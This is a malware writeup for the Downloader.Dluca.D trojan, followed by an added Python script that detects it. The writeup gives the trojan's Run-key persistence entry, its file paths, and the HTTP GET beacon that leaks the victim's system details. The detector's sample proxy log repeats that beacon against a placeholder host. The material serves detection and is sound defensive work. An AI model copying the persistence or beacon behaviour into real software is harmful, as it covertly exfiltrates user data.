Downloader.Dluca.D

Discovered: October 29, 2003
Updated: October 30, 2003 5:21:29 PM
Systems Affected: Windows

Downloader.Dluca.D is a downloader trojan that sends information about the compromised system to a specific website.

Downloader.Dluca.D is a trojan program that sends information about the compromised system to a remote website. When the trojan is installed, it creates the following copies of itself:
%System%\DLuxjp-uninstall.exe
C:\Program Files\Dialers\Dluxjp\DLuxjp.exe

It also creates the following icon file:
C:\Program Files\Dialers\Links\DLuxjp.ico

It then creates the following registry entry so that it executes every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Dluxjp"="C:\Program Files\Dialers\Dluxjp\Dluxjp.exe /noconnect"

It also inserts the following registry values:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\uninstall\DLuxjp\"DisplayName" = "DLuxjp"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\uninstall\DLuxjp\"UninstallString" = "%System%\DLux-uninstall.exe /uninstall"

HKEY_CURRENT_USER\SOFTWARE\SiteIcons\Dialers\DLuxjp\"ICN" = "Y"

HKEY_CURRENT_USER\SOFTWARE\SiteIcons\Dialers\DLuxjp\"MIMETRYPE_DESCRIPTION" = ".x"

The trojan then sends system information to a remote system on TCP port 80. It sends the following HTTP GET request:
GET /w/getclientid?srv=winde&ver=0,0,0,70&pin=999997&OSInfo=Windows_4.10.67766446__A__PlatformID_1&GMC=1061242491 HTTP/1.1
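The following Python script is an added, defender-side example that is not part of the original writeup. It turns the indicators listed above into two checks: one parses a .reg export of the Run key and flags the "Dluxjp" persistence value, the other scans web-proxy log lines for the /w/getclientid beacon and extracts the fields the trojan leaks (srv, ver, pin, OSInfo, GMC). The registry export, the proxy log layout (timestamp, client, method, URL, status) and the beacon host name BEACON-HOST-PLACEHOLDER are all constructed for the example; the writeup does not give the destination host.

```python
"""Detection helpers for the Downloader.Dluca.D indicators in the writeup above.

Added example code, not part of the original writeup. All sample inputs
below are constructed; only the paths, registry values and request line
come from the writeup.
"""
from urllib.parse import urlsplit, parse_qs

# Persistence indicator quoted from the writeup.
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "Dluxjp"
RUN_VALUE_DATA = r"C:\Program Files\Dialers\Dluxjp\Dluxjp.exe /noconnect"

# Network indicator quoted from the writeup. The detector keys on the request
# path, not on the pin/GMC values, which are only the sample values shown.
BEACON_PATH = "/w/getclientid"
BEACON_FIELDS = ("srv", "ver", "pin", "OSInfo", "GMC")

# Constructed .reg export fragment (not from a real host). .reg syntax doubles
# backslashes inside quoted data; parse_reg_export undoes that.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SomeVendorTray"="C:\\Program Files\\Vendor\\tray.exe"
"Dluxjp"="C:\\Program Files\\Dialers\\Dluxjp\\Dluxjp.exe /noconnect"

[HKEY_CURRENT_USER\SOFTWARE\SiteIcons\Dialers\DLuxjp]
"ICN"="Y"
'''

# Constructed proxy log: timestamp, client IP, method, URL, status.
# BEACON-HOST-PLACEHOLDER stands in for the destination, which the writeup omits.
SAMPLE_PROXY_LOG = [
    "2003-10-29T10:12:01 10.0.0.5 GET http://www.example.com/index.html 200",
    "2003-10-29T10:12:03 10.0.0.17 GET http://BEACON-HOST-PLACEHOLDER"
    "/w/getclientid?srv=winde&ver=0,0,0,70&pin=999997"
    "&OSInfo=Windows_4.10.67766446__A__PlatformID_1&GMC=1061242491 200",
    "2003-10-29T10:12:04 10.0.0.5 GET http://www.example.com/w/other?pin=1 404",
]


def parse_reg_export(text):
    """Parse a .reg export into {key_path: {value_name: value_data}}."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip('"')
            data = data.strip().strip('"').replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def find_run_persistence(reg):
    """Return (value_name, data) pairs in the Run key that match the indicator.

    Registry names are case-insensitive, so comparisons are lowercased. A hit
    is either the quoted value name or any Run entry pointing into the
    Dialers\\Dluxjp directory, in case the value was renamed.
    """
    hits = []
    for key, values in reg.items():
        if key.lower() != RUN_KEY.lower():
            continue
        for name, data in values.items():
            if name.lower() == RUN_VALUE_NAME.lower() or "dialers\\dluxjp\\" in data.lower():
                hits.append((name, data))
    return hits


def extract_beacon(url_or_path):
    """Return the beacon's query fields if the URL hits BEACON_PATH, else None.

    Accepts a full URL (proxy log) or a bare request target (HTTP request line).
    """
    parsed = urlsplit(url_or_path)
    if parsed.path != BEACON_PATH:
        return None
    query = parse_qs(parsed.query, keep_blank_values=True)
    fields = {name: query.get(name, [""])[0] for name in BEACON_FIELDS}
    fields["host"] = parsed.netloc
    return fields


def scan_proxy_log(lines):
    """Flag beacon requests in proxy log lines and report who sent them."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        fields = extract_beacon(parts[3])
        if fields is None:
            continue
        fields.update(timestamp=parts[0], client=parts[1])
        hits.append(fields)
    return hits


if __name__ == "__main__":
    for name, data in find_run_persistence(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"persistence: {RUN_KEY}\\{name} = {data}")
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"beacon from {hit['client']} at {hit['timestamp']}: OSInfo={hit['OSInfo']}")
```

The detector matches on the request path rather than on the pin and GMC values because those are the values observed in one sample and may vary between infections; the OSInfo field, which carries the victim's Windows version string, is what an analyst will want to see in the alert. On a live host the same Run-key check can be made against a fresh `reg export` of the key, and the Dialers\Dluxjp paths can be checked for the three files the writeup lists.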